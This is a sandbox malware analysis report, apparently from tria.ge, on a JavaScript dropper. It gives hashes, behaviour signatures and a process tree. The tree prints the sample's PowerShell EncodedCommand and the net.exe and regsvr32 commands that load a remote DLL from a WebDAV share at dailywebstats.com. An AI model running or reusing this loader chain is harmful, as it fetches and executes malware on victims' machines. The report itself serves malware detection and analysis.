Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
132s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
21/08/2024, 15:57
Static task
static1
Behavioral task
behavioral1
Sample
a4d988e16af841243a863f4e0b905431c9e6d66b9746657e259e6b13db75db25.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
a4d988e16af841243a863f4e0b905431c9e6d66b9746657e259e6b13db75db25.js
Resource
win10v2004-20240802-en
General
-
Target
a4d988e16af841243a863f4e0b905431c9e6d66b9746657e259e6b13db75db25.js
-
Size
13KB
-
MD5
c0ed197aef6e402ba2f1f286ef7a5e0b
-
SHA1
50dddbc2aad2e5c20f84b146718aae109ac184bc
-
SHA256
a4d988e16af841243a863f4e0b905431c9e6d66b9746657e259e6b13db75db25
-
SHA512
6fb36968dbc7a00471258f2df63a7adacafca53d7750f199c440fb502a7fa3d0b27c208de824792b9107b1dc11df6c4acbe5038ae897d98258c9f27fa331bd7f
-
SSDEEP
96:6To/qCXep9vYcV9YDuHDwDQDmFouDylnCDoDnDVLD5ouDylnCDoDnDiND:1qCu9nV9YKHccwWlnCkDRLrWlnCkDm5
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation wscript.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1796 powershell.exe 1796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1796 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3292 wrote to memory of 1796 3292 wscript.exe 86 PID 3292 wrote to memory of 1796 3292 wscript.exe 86 PID 1796 wrote to memory of 4484 1796 powershell.exe 88 PID 1796 wrote to memory of 4484 1796 powershell.exe 88 PID 1796 wrote to memory of 900 1796 powershell.exe 89 PID 1796 wrote to memory of 900 1796 powershell.exe 89
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\a4d988e16af841243a863f4e0b905431c9e6d66b9746657e259e6b13db75db25.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADMAMwA5ADgAMwAyADUAMwAxADQAMAA2ADgALgBkAGwAbAA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\3⤵PID:4484
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\3398325314068.dll3⤵PID:900
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82